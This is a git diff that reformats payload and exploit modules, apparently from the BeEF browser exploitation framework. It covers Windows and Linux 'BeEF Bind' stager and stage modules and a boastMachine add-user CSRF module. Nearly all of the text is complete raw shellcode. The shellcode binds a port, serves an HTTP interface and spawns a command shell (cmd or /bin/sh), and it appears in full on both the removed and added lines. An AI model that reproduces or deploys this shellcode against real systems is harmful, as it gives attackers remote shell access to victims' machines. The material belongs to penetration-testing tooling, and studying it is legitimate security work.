"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" + - "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80" - } - )) - end - - # Stage encoding is safe for this payload - def encode_stage? - true - end + # Stage encoding is safe for this payload + def encode_stage? + true + end end - diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb index 712e95b21..61ff52e3f 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb @@ -2,7 +2,6 @@ # $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$ ## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,123 +14,113 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module MetasploitModule + include Msf::Payload::Windows + include Msf::Sessions::CommandShellOptions - include Msf::Payload::Windows - include Msf::Sessions::CommandShellOptions + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Windows Command Shell Stage (stager)', + 'Version' => '$Revision: 11421 $', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => ['Ty Miller'], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShellWindows, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [511, 'n'] + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \ + "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \ + "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \ + "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \ + "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \ + "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \ + "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \ + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \ + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \ + "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \ + "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \ + "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \ + "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \ + "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \ + "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \ + "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \ + "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \ + "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \ + "\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \ + "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \ + "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \ + "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \ + "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \ + "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \ + "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \ + "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \ + "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \ + "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \ + "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \ + "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \ + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \ + "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \ + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \ + "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \ + "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \ + "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \ + "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \ + "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \ + "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \ + "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \ + "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \ + "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \ + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \ + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \ + "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \ + "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \ + "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \ + "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \ + "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \ + "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \ + "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \ + "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \ + "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \ + "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \ + "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \ + "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \ + "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \ + "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \ + "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \ + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \ + "\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \ + "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \ + "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \ + "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \ + "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \ + "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \ + "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \ + "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \ + "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \ + "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \ + "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \ + "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \ + "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \ + "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \ + "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \ + "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \ + "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \ + "\xff\xd5\xe9\x58\xfe\xff\xff" + })) + end - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind Windows Command Shell Stage (stager)', - 'Version' => '$Revision: 11421 $', - 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', - 'Author' => [ 'Ty Miller' ], - 'License' => BSD_LICENSE, - 'Platform' => 'win', - 'Arch' => ARCH_X86, - 'Session' => Msf::Sessions::CommandShellWindows, - 'PayloadCompat' => - { - 'Convention' => 'beef_bind' - }, - 'Stage' => - { - 'Offsets' => - { - 'LPORT' => [ 511, 'n' ] - }, - 'Payload' => - "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" + - "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" + - "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + - "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" + - "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" + - "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" + - "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + - "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + - "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" + - "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" + - - "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" + - "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" + - "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" + - "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + - "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" + - "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" + - "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" + - "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" + - "\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" + - "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" + - - "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" + - "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" + - "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" + - "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" + - "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" + - "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" + - "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" + - "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" + - "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" + - "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + - - "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" + - "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + - "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" + - "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" + - "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" + - "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" + - "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" + - "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" + - "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" + - "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" + - - "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" + - "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" + - "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + - "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" + - "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" + - "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" + - "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" + - "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" + - "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" + - "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" + - - "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" + - "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" + - "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" + - "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" + - "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" + - "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" + - "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" + - "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" + - "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + - "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" + - - "\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" + - "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" + - "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" + - "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" + - "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" + - "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" + - "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" + - "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" + - "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" + - "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" + - - "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" + - "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" + - "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" + - "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" + - "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" + - "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" + - "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" + - "\xff\xd5\xe9\x58\xfe\xff\xff" - } - )) - end - - # Stage encoding is safe for this payload - def encode_stage? - true - end + # Stage encoding is safe for this payload + def encode_stage? + true + end end - diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb index e5245bde5..fbbe77bdb 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb @@ -5,45 +5,40 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/handler/beef_bind' - module MetasploitModule + include Msf::Payload::Stager + include Msf::Payload::Linux - include Msf::Payload::Stager - include Msf::Payload::Linux - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind HTTP Stager', - 'Description' => 'Proxy web requests between a web browser and a shell', - 'Author' => ['Bart Leppens'], - 'License' => BSD_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X64, - 'Handler' => Msf::Handler::BeefBind, - 'Convention' => 'beef_bind', - 'Stager' => - { - 'RequiresMidstager' => false, - 'Offsets' => { 'LPORT' => [ 54, 'n' ] }, - 'Payload' => - "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" + - "\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" + - "\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" + - "\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" + - "\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" + - "\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" + - "\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" + - "\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" + - "\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" + - "\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" + - "\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" + - "\x01\xc6\xff\xe6" - } - )) - end - + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Handler' => Msf::Handler::BeefBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [54, 'n'] }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" \ + "\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" \ + "\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" \ + "\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" \ + "\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" \ + "\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" \ + "\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" \ + "\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" \ + "\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" \ + "\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" \ + "\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" \ + "\x01\xc6\xff\xe6" + })) + end end diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb index 1cc863faf..11f06663f 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb @@ -5,43 +5,38 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/handler/beef_bind' - module MetasploitModule + include Msf::Payload::Stager + include Msf::Payload::Linux - include Msf::Payload::Stager - include Msf::Payload::Linux - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind HTTP Stager', - 'Description' => 'Proxy web requests between a web browser and a shell', - 'Author' => ['Bart Leppens'], - 'License' => BSD_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::BeefBind, - 'Convention' => 'beef_bind', - 'Stager' => - { - 'RequiresMidstager' => false, - 'Offsets' => { 'LPORT' => [ 47, 'n' ] }, - 'Payload' => - "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" + - "\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" + - "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" + - "\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" + - "\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" + - "\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" + - "\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" + - "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" + - "\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" + - "\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7" - } - )) - end - + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeefBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [47, 'n'] }, + 'Payload' => + "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" \ + "\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" \ + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" \ + "\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" \ + "\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" \ + "\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" \ + "\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" \ + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" \ + "\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" \ + "\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7" + })) + end end diff --git a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb index cbac5b358..bb91bd878 100644 --- a/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb +++ b/modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb @@ -9,54 +9,49 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/handler/beef_bind' - module MetasploitModule + include Msf::Payload::Stager + include Msf::Payload::Windows - include Msf::Payload::Stager - include Msf::Payload::Windows - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'BeEF Bind HTTP Stager', - 'Version' => '$Revision: 9179 $', - 'Description' => 'Proxy web requests between a web browser and a shell', - 'Author' => ['Ty Miller'], - 'License' => BSD_LICENSE, - 'Platform' => 'win', - 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::BeefBind, - 'Convention' => 'beef_bind', - 'Stager' => - { - 'RequiresMidstager' => false, - 'Offsets' => { 'LPORT' => [ 200, 'n' ] }, - 'Payload' => - # Length: 299 bytes - "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + - "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + - "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + - "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + - "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + - "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + - "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + - "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + - "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + - "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + - "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + - "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + - "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + - "\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" + - "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" + - "\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" + - "\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" + - "\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" + - "\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6" - } - )) - end - + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Version' => '$Revision: 9179 $', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Ty Miller'], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeefBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [200, 'n'] }, + 'Payload' => + # Length: 299 bytes + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" \ + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" \ + "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" \ + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" \ + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \ + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" \ + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \ + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" \ + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" \ + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" \ + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" \ + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" \ + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" \ + "\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" \ + "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" \ + "\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" \ + "\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" \ + "\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" \ + "\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6" + })) + end end diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb index 7da4a5411..d83b6ae91 100644 --- a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb @@ -4,18 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Boastmachine_add_user_csrf < BeEF::Core::Command + def self.options + [ + { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog' }, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username' }, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password' }, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com' } + ] + end - def self.options - return [ - { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'}, - { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, - { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, - { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb index 81478adee..7e1639250 100644 --- a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb +++ 